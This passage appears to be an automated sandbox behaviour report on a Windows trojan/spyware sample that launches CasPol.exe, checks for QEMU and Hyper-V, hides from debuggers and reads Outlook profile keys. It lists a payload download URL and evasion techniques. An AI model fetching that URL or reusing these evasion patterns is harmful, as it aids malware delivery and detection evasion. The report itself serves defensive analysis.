          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_200343205_2_20034320
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_2003C5785_2_2003C578
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_2003BF485_2_2003BF48
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_200311205_2_20031120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_200337085_2_20033708
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 20036288 appears 52 times
          Source: 9TpV4rfMmJ.exe, 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSxsStore.dllj% vs 9TpV4rfMmJ.exe
          Source: 9TpV4rfMmJ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9TpV4rfMmJ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9TpV4rfMmJ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
          Source: 9TpV4rfMmJ.exeStatic PE information: invalid certificate
          Source: 9TpV4rfMmJ.exeVirustotal: Detection: 15%
          Source: 9TpV4rfMmJ.exeReversingLabs: Detection: 25%
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeFile read: C:\Users\user\Desktop\9TpV4rfMmJ.exeJump to behavior
          Source: 9TpV4rfMmJ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\9TpV4rfMmJ.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe"
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe"
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe" Jump to behavior
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe" Jump to behavior
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040352D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeFile created: C:\Users\user\AppData\Local\Temp\nsn8B13.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/5@2/2
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_004021AA CoCreateInstance,2_2_004021AA
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_0040498A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: 9TpV4rfMmJ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: secur32.pdb source: secur32.dll.2.dr
          Source: Binary string: SxsStore.pdb source: sxsstore.dll.2.dr
          Source: Binary string: secur32.pdbUGP source: secur32.dll.2.dr
          Source: Binary string: SxsStore.pdbGCTL source: sxsstore.dll.2.dr

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000005.00000000.250546924581.0000000000D00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_716630C0 push eax; ret 2_2_716630EE
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_04695064 push eax; retf 2_2_046950BC
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_04691E42 push ecx; iretd 2_2_04691E4B
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_04690A38 push edx; ret 2_2_04690A4B
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_04693D37 push esi; iretd 2_2_04693D7E
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_04694FEA push eax; retf 2_2_046950BC
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_04691EF0 push edi; retf 2_2_04691EFB
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_04690AA3 push ds; retf 2_2_04690AA4
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_046906A2 push edi; ret 2_2_046906A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00D0F54B push ds; iretd 5_2_00D0F557
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01162177 push edi; retn 0000h5_2_01162179
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_011663FC push E8009BBFh; ret 5_2_01166401
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01220312 push 8BFFFFFFh; retf 5_2_01220318
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_20032D3B push edx; retf 5_2_20032D3C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_20032E10 push ecx; retf 5_2_20032E12
          Source: secur32.dll.2.drStatic PE information: section name: .didat
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_71661BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_71661BFF
          Source: secur32.dll.2.drStatic PE information: 0xAEC0B68B [Mon Nov 27 15:00:27 2062 UTC]
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeFile created: C:\Users\user\AppData\Local\Temp\secur32.dllJump to dropped file
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeFile created: C:\Users\user\AppData\Local\Temp\sxsstore.dllJump to dropped file
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeFile created: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665555642.0000000004790000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLBWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSHTML.TLB
          Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665555642.0000000004790000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255489071529.0000000001020000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: CasPol.exe, 00000005.00000002.255489071529.0000000001020000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://WWW.KONUTMARKET.COM/2022FILE_IZNUHDOSU25.BIN
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7492Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sxsstore.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9930Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0116A630 sldt word ptr [eax]5_2_0116A630
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405C49
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_00406873 FindFirstFileW,FindClose,2_2_00406873
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_0040290B FindFirstFileW,2_2_0040290B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeAPI call chain: ExitProcess graph end nodegraph_2-4675
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeAPI call chain: ExitProcess graph end nodegraph_2-4831
          Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: CasPol.exe, 00000005.00000003.251683839425.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488312809.0000000000EB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5
          Source: CasPol.exe, 00000005.00000002.255487878510.0000000000E58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
          Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665555642.0000000004790000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlbwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\mshtml.tlb
          Source: CasPol.exe, 00000005.00000003.251683839425.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488312809.0000000000EB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665555642.0000000004790000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255489071529.0000000001020000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: CasPol.exe, 00000005.00000002.255489071529.0000000001020000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://www.konutmarket.com/2022file_izNuHdosu25.bin
          Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: 9TpV4rfMmJ.exe, 00000002.00000002.250665646078.0000000004859000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: CasPol.exe, 00000005.00000002.255490920861.0000000002B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat

          Anti Debugging

          barindex
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeCode function: 2_2_71661BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_71661BFF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\9TpV4rfMmJ.exeProcess queried: DebugPortJump to behavior
